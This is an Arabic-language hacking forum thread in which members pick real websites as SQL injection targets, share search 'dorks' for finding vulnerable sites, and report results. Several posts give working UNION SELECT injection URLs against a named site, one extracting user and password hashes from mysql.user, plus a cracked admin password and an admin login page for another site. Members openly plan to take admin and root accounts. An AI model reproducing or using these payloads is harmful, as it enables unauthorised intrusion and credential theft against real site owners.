![]() |
ok لكن قبل كل شيئ هذا موقع أنا تأكدتمن أنه مصاب وكذلك وجدت أن عدد الأعمدة 9 لكن لم أجد الأعمدة المصابة أعتقد أنها في ال source الخاص بالصفحة و أنا لا أحب أبدا البحث فيه لذلك سأهديه لكم وها هو كود: http://www.pixheaven.net كود: http://mp3hungama.com ههههههههههههههههههههههههه إذا هجوم |
اخوي دارك مان راح اشوف المشكلة ذي |
الشبح المرح ============ شكرا أخي أنا و الله أكره و أمقت البحث في السورس الخاص بالصفحة عن نتيجة الإستعلام لذا أرجو الأعضاء يستفيدو |
هل من جديد ؟؟ |
[align=center]ممممم كنت عمكتب موضوع... ممم ما قدرت لا على الاول ولا على الثاني وواضح انو ما قدر احد يحقنهم يدوي لذلك راح اجرب الان البرامج + انتو ابحثو عن اهداف جديدة انا الان ارجع + شكرا دارك على الاهداف تحياتي[/align] |
[align=center]الموقع الاول ما لقيت فيها اي عمود خاص باليوزر او الباس اما الثاني فيطلع معي اليوزرات هيك 0000 000004 00000006 وهيك اما الباس تبع اليوزر بيطلع عادي بس اليوزر خطا جاري البحث عن هدف جديد... تحياتي[/align] |
اخواني هل يوجد برنامج اعطيه موقع و هو يبحت عن التغرة لي فيه متلا اعطيه موقع www.xxx.com و هو يبحت و يجيب لي السكريب او سكرسبتات المصابة ب sql و انا احقن المهم كيف تهكرون موقع مستهدف اي ليس عندكم سكريبت المصاب و ترودون ان تحقنوه ارجو الاجابة عن هده الاسالة و جزاكم الله خيرااا |
|
اقتباس:
كود PHP: تحياتي [/align] |
اقتباس:
|
اقتباس:
|
[align=center]تم الحقن... هذا الباس : كود PHP: الباس بعد فك التشفير : talgan يوزر الادمن : كود PHP: لوحة الدخول : http://www.new.katif.net/login.php بالتوفيق تحياتي [/align] |
اقتباس:
احسنت اخى ياريت اخى دارك موقع فيه فلترة او فوربيدن نشتغل عليه شوية مع الاعضاء منتظر الهدف الجديد |
كود: أخي العزيز |
الله يعطيك العافية اخي ooooo_darkman_ooooo |
يعني أنا و الأخ Master vbspiders إصطدنا عصفورين بحجر واحد وجاري صيد الثالث |
اقتباس:
نعم اخى دارك ظهرت نتائج مختلفة للاختلاف قاعدة البيانات |
[align=center]هههه الان جربت فعلا احول للغة الانجليزية وفعلا فتح معي غير موقع هههه بارك الله فيك اخي ooooo_darkman_ooooo واصل تحياتي لك [/align] |
[align=center]medoo_mohamed شكرااا على الهدف ^_^ تحياتي[/align] |
Master vbspiders =============== الله يبارك فيك خويا --------------------------------- medoo_mohamed أعلم هذا أخي ومازال هناك أخرى ( .....أشك أنها أكثر من ثلاثة قواعد ) |
New sql injection dork [align=center]دوركات جديدة من نوعها... بالتوفيق كود PHP: وهذه دوركات لشوبينغ كود PHP: نريد هدف جديد عن طريق هالدوركات ^_* تحياتي [/align] |
Master vbspiders شكرا أخي الكريم |
|
هناك اربع قواعد بيانات لهذا الموقع اعتقد موقع استضافة |
جاري بإذن الله |
أخي العزيز medoo_mohamed أعجبتني بعض الأشياء في هذا الهدف وهي 1- هناك root 2- الموقع خفيف التصفح جدا 3- يحمل علم الإتحاد الأوروبي ههههههههههههههههههههههههههه جاري المتابعة + هناك طريقة حقن جديدة ههههههههههه أنا أطبقها الآن |
ههههههههه فعلا علم الاتحاد الاوروبىلوحدة يغيظ علشان كده نشتغل عليه بذمة شوية هههههههههه وجود الروت بتاعه عاجبنى بس للاسف باسوورد الروت مش راضى يطلع معرفش ليه |
تفضل أخي العزيز كود: http://www.adas-fusion.eu/theme.php?id=-4 UNION SELECT 1,2,3,group_concat(database(),0x3a,user(),0x3a,@@version),5,6-- |
هاته النتائج أنا طلعتها بواسطة طريقة حقن جديدة هههههههههههههههههههههههههههههههههههههههه |
medoo_mohamed أخي العزيز أنا طلعت أشياء أخرى بطريقة أخرى وجاري وضع الإستغلال كامل ------------------------ يوم رمضان هذا و الله مبارك علي هههههههههههههههههه تعلمت حوالي 50 شيئ في ظرف 3 ساعات |
احسنت اخى على الحقن بطرق جديدة ان شاء الله فى تقدم وان شاء الله يستفيد الاعضاء اللى يدخلوا الموضوع ونستفاد معاهم |
medoo_mohamed أخي العزيز لم التالي 1- سحب باسوورد ويوزر الأدمن 2- الأعضاء ال 5 اللي معاه (ربما أدمن حتى هم ) 3- إيجاد الهوست و الباس و اليوز للدحول بحساب root هههههههههههههههههههههههههههههههههههههههههههههههه الحمد لله الآن أنا ذاهب في المساء سأعود وتكون النتائج أمامك لأني مازال ملخمنتش لوحة التحكم + جاري الإطلاع على المواقع اللي على هذا السيرفر قبل عمل أي خطوة لنا عودة في المساء بعد الإنتهاء من الرياضة أنا خارج الآن |
وانا متواجد الليلة ان شاء الله وفيه اهداف جديدة ترجع بالسلامة يا غالى |
تفضل أخي الحقنة التي وعدتك بها كود: mantis_user_table:password:bugtracker كود: http://www.adas-fusion.eu/workpackage.php?id=-1%20UNION%20SELECT%201,2,3,4,concat%28user,0x3a,password%29,6+from+mysql.user-- |
+ أنا تفحصت الموقع هوفقط المركب على السيرفر المحلي بالإصاقة إلى موقعين أو ثلاثة تابعة لنفس الموقع |
[align=center]ما يجيبها الا رجالها ابطال والله... واصلو تحياتي[/align] |
السلام عليكم شباب ممكن هدف سهل أتعلم عليه |
اقتباس:
تحياتي[/align] |
اقتباس:
and try to injecting it again that's so easy to do for can know your mistake and for learn more about that |
شكرا لك أخي |
الساعة الآن 03:45 PM |
[ vBspiders.Com Network ]